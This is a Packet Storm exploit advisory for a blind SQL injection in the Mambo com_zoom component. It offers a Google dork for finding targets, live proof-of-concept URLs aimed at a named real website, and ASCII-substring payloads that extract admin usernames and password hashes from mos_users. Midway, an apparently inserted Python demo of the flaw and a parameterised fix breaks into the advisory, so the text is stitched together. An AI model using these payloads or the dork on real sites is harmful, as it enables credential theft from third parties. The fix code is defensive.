Mambo Zoom Blind SQL Injection

2009-09-04T00:00:00
ID PACKETSTORM:80992
Type packetstorm
Reporter boom3rang
Modified 2009-09-04T00:00:00

Description

Mambo component com_zoom (catid) Blind SQL injection [_][-][X]
_ ___ _ ___ ___ ___ _____ __ ___ __ __ ___   
| |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \   
| ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /   
|_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/   
  
  
Red n'black i dress eagle on my chest.   
It's good to be an ALBANIAN Keep my head up high for that flag i die.   
Im proud to be an ALBANIAN  
###################################################################   
  
Author : boom3rang   
Contact : boom3rang[at]live.com   
Greetz : H!tm@N - KHG - cHs  
  
R.I.P redc00de   
-------------------------------------------------------------------   
  
Affected software description   
<name>zoom</name>  
<creationDate>20/01/2004</creationDate>  
<author>Mike de Boer</author>  
<authorEmail>mailme@mikedeboer.nl</authorEmail>  
<authorUrl>www.mikedeboer.nl</authorUrl>  
<version>2.0</version>   
-------------------------------------------------------------------   
  
[~] SQLi :   
  
http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]   
  
[~]Google Dork :   
  
inurl:com_zoom inurl:"imgid"   
  
-------------------------------------------------------------------   
  
[~] Table_NAME = mos_users  
[~] Column_NAME = username - password   
-------------------------------------------------------------------   
  
[~] Admin Path :   
  
http://www.TARGET.com/administrator  
  
===================================================================   
= POC =  
===================================================================   
  
  
[~] Live Demo:  
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False
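The True/False pair above is all a boolean-based blind injection needs: the page renders normally when the injected condition holds and differently when it does not. The Python below is an added example, not code from the advisory or from the Mambo project. It reproduces that behaviour against a throwaway in-memory SQLite table (the table name, column names and rows are made up for the demo) and places the fix next to it: accept `catid` only if it is a plain decimal integer, then bind it as a query parameter so it is data, never SQL. The query is padded with an `ORDER BY` so the PoC's trailing `/*` has something to comment out, which is exactly why that comment is in the original payload.

```python
import re
import sqlite3


def open_demo_db():
    """Constructed stand-in for the component's category table (made-up schema and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (catid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)",
                     [(21, "Holiday 2004"), (22, "Family")])
    return conn


def lookup_category_vulnerable(conn, raw_catid):
    """The bug class in the advisory: the request parameter is pasted into the SQL text.
    '21/**/and/**/1=2/*' therefore rewrites the WHERE clause and the unterminated '/*'
    swallows the rest of the statement (here the ORDER BY)."""
    sql = "SELECT name FROM categories WHERE catid=" + raw_catid + " ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def is_valid_catid(raw_catid):
    """A category id is a run of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]+", raw_catid.strip()) is not None


def parse_catid(raw_catid):
    """Strict validation, the equivalent of PHP's intval() plus refusing anything that was
    not purely numeric to begin with. Anything else is an error, never SQL."""
    if not is_valid_catid(raw_catid):
        raise ValueError(f"rejected non-numeric catid: {raw_catid!r}")
    return int(raw_catid.strip())


def lookup_category_hardened(conn, raw_catid):
    """Validate first, then bind the value as a parameter so the driver never parses it."""
    catid = parse_catid(raw_catid)
    rows = conn.execute("SELECT name FROM categories WHERE catid=? ORDER BY name", (catid,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = open_demo_db()
    for probe in ("21", "21/**/and/**/1=1/*", "21/**/and/**/1=2/*"):
        print(f"vulnerable  catid={probe!r:22} -> {lookup_category_vulnerable(db, probe)}")
        try:
            print(f"hardened    catid={probe!r:22} -> {lookup_category_hardened(db, probe)}")
        except ValueError as exc:
            print(f"hardened    catid={probe!r:22} -> {exc}")
```

SQLite, like MySQL, treats `/**/` as whitespace and lets an unterminated `/*` run to the end of the statement, so the two probe values behave here just as the advisory shows them behaving on the live site; the hardened path rejects both before any SQL is built.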
  
-------------------------------------------------------------------  
  
[~] ASCII   
index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96  
  
-------------------------------------------------------------------  
  
[~] Live Demo ASCII  
  
True  
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96   
  
False  
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97  
  
As we see, the first character of the username is 'a' (char(97) = 'a').
Now change the second limit to find the other characters. Good luck...
  